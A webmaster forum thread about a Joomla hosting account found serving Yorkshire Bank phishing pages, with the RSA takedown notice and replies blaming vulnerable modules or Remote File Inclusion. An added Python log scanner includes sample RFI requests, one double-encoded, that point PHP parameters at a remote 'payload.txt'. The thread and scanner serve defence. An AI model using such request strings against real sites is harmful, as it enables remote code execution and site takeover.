Phishing attack on my domain

Status
Closed to further replies.

morris2003

Silver User
5 July 2007
I administer a domain and last night my account was blocked following this email:

Dear Customer,
Thank you for contacting customer support. We appreciate you taking the time to write us.
We have received this message:

RSA, an anti-fraud and security company, is under contract to assist YORKSHIRE Bank and its related entities in preventing or terminating online activity that targets Yorkshire's Bank clients as potential fraud victims. RSA has been made aware that you appear to be providing Internet Services to a fraudulent Web site, which is part of a "phishing scam"*. This activity violates Yorkshire's Bank copyright, trademark and other intellectual property rights and may violate the criminal laws of the United States and other nations.

E-mail messages have been broadly distributed to individuals by a person or entity pretending to be YORKSHIRE Bank. These e-mails use Yorkshire's Bank name and identity (including trademarks) without authorization. The e-mails request recipients to verify and submit sensitive details related to their YORKSHIRE Bank accounts. Within the fraudulent e-mail message, there is a link that leads the recipients to a fraudulent website displaying Yorkshire's Bank copyrighted materials and trademarks. The fraudulent website is located at the following URL addresses to which you provide services and which are under your control:

http://xxx/atletic2.trsdirect2ybonline.co.uk/login.ct.php (2142)
http://xxx/atletic1.c0udirect2ybonline.co.uk/login.ct.php (2142.01)
http://xxx/atleticatletic20hdirect2ybonline.co.uk/login.ct.php (2142.02)
http://xxx/atletic1u.3hdirect2ybonline.co.uk/login.ct.php (2142.03)
http://xxx/atletic1.7q0ndirect2ybonline.co.uk/login.ct.php (2142.04)
http://xxx/atletic24u.0direct2ybonline.co.uk/login.ct.php (2142.05)
http://xxx/atletic3uu1direct2ybonline.co.uk/login.ct.php (2142.06)

The fraudulent website not only represents a misuse of Yorkshire's Bank intellectual property; its purpose is to improperly obtain personal information of YORKSHIRE Bank customers in order to fraudulently access their bank accounts. The owners of those websites typically perpetrate identity-theft related activities, such as using customer’s credit cards or bank accounts without authorization. In addition, since the vast majority of all of the e-mails are not being sent to actual YORKSHIRE Bank customers, the actions may serve to damage the reputation and image of YORKSHIRE Bank.
Please take all necessary steps to immediately shut down the fraudulent website, terminate its availability to the Internet and discontinue the transmission of any e-mails associated with this website.

We understand that you may not be aware of this improper use of your services and we appreciate your cooperation. We specifically would ask that you also take the following actions:

Please provide us with a tar/zip file of the source code for this site, so that we may analyze it to help prevent further attacks.

If any customer data has been captured that is stored on your systems or equipment, please send us that data so that the customers to whom that data relates can be notified and take steps to protect their credit.

Please provide a copy of any records you maintain that indicate the name, contact information, method of payment or similar information that may be useful in helping learn about the identity and location of the customer for whom the website has been operated.

Thank you for your cooperation to prevent and terminate this fraudulent activity.
Sincerely,
RSA Anti Fraud Command Center
Tel: +44(0)800-032-7751 (UK)
Tel: +1-866-408-7525 (US)
Fax: +972-9-9566658 (EU)
Fax: +1-212-208-4644 (US)
E-mail: [email protected]

YORKSHIRE Bank Legal Department
Name: Dispute Resolution
Address: Level 2, 40 St Vincent Place, Glasgow, G1 2HL
Tel: +44 141 242 3719
Fax: +44 141 242 4723

*"Phishing" is an e-mail scam that attempts to trick consumers into revealing personal information, such as their credit or debit account numbers, checking account information, Social Security Numbers, or banking account passwords, through an imposter's Web site or in a reply e-mail.


We checked and your hosting account does indeed contain many files; we must necessarily format your account because it is infected. For the moment we are suspending it until your reply, to allow you to save some files.

Please let us know if we can help you in any other way.

Yours Faithfully,
Support/Sales Dept.

I had Joomla 1.5.15 installed. How is it possible that they managed to create such subfolders and the related files without accessing the FTP space? (I checked the FTP logs and everything is regular)...
 
Joomla is a relatively young CMS. It is natural that it is the one most exposed to attacks. For my sites I use PHP Nuke, which in my opinion is the most stable and secure, but that is only my personal opinion. :sisi:
 
Which modules have you installed in Joomla?
Most likely they used buggy modules for file upload (for example photos) already present in your CMS, or an RFI (Remote File Inclusion) attack. In the second case you can always check the HTTP logs.
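
The log check suggested in the reply above, as an added example that is not part of the original thread: a small Python scanner that parses Apache combined-format access log lines and flags any query-string parameter whose (possibly percent-encoded) value points at a remote host, which is the signature of a Remote File Inclusion attempt against a PHP application such as Joomla. The log lines, IP addresses, component path and parameter names are constructed for the example and do not come from the poster's server.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format (assumed layout for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# A parameter value that starts with a URL scheme is what include()/require()
# in PHP would fetch over the network when allow_url_include is enabled.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines (RFC 5737 documentation addresses, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jul/2007:22:13:05 +0200] '
    '"GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5123 '
    '"-" "Mozilla/5.0"',
    '198.51.100.23 - - [04/Jul/2007:22:14:41 +0200] '
    '"GET /components/com_example/helper.php?file=http://203.0.113.99/payload.txt? HTTP/1.1" 200 812 '
    '"-" "libwww-perl/5.805"',
    # Same client, scheme double percent-encoded to slip past naive string matching.
    '198.51.100.23 - - [04/Jul/2007:22:14:42 +0200] '
    '"GET /index.php?page=http%253A%252F%252F203.0.113.99%252Fpayload.txt HTTP/1.1" 500 0 '
    '"-" "libwww-perl/5.805"',
    # Legitimate redirect-style parameter: flagged too, so a reviewer must triage.
    '192.0.2.5 - - [04/Jul/2007:22:15:00 +0200] '
    '"GET /index.php?url=https://www.example.com/ HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0"',
]


def find_rfi_params(target):
    """Return [(param, decoded_value)] for query parameters whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded one layer; decode once more for double encoding.
        candidate = unquote(value)
        if REMOTE_SCHEME_RE.match(candidate):
            hits.append((key, candidate))
    return hits


def scan_log(lines):
    """Parse each log line and collect requests carrying remote-URL parameters."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = find_rfi_params(m.group('target'))
        if hits:
            findings.append({
                'ip': m.group('ip'),
                'time': m.group('time'),
                'status': int(m.group('status')),
                'target': m.group('target'),
                'params': hits,
            })
    return findings


def count_by_client(findings):
    """Number of suspicious requests per client IP, to spot the scanning host quickly."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} {f['params']}")
    print(count_by_client(scan_log(SAMPLE_LOG)))
```

Run it against a real access log with `scan_log(open('access.log'))`. The rule is deliberately broad: any parameter carrying a remote URL is reported, so the last sample line (a harmless-looking redirect parameter) also shows up and has to be triaged by hand; a 200 response to a request of this shape against a component that should never accept a URL is the line worth investigating first, and the per-client count points at the host that was probing.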
 
morris2003 said:
murdercode said:
Rather than blaming Joomla, I would blame sloppily written modules
Can you explain better please?

Simple: Joomla in itself is certainly more secure than the modules and extensions written by third parties, which are not directly reviewed for security by the core team.
 